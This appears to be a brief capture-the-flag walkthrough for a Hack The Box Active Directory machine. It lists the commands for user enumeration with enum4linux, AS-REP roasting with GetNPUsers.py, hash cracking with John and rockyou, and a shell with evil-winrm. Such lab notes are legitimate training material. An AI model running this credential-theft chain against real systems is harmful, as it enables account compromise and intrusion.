Find usernames
enum4linux 10.10.10.161**Find Passwords **(If Kerberos pre-authentication is disabled)
GetNPUsers.py htb.local/ -dc-ip 10.10.10.161 -requestSave any hashes, then crack with John
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txtPossible Shell with creds
evil-winrm -i 10.10.10.161 -u [username] -p 'PASSWORD’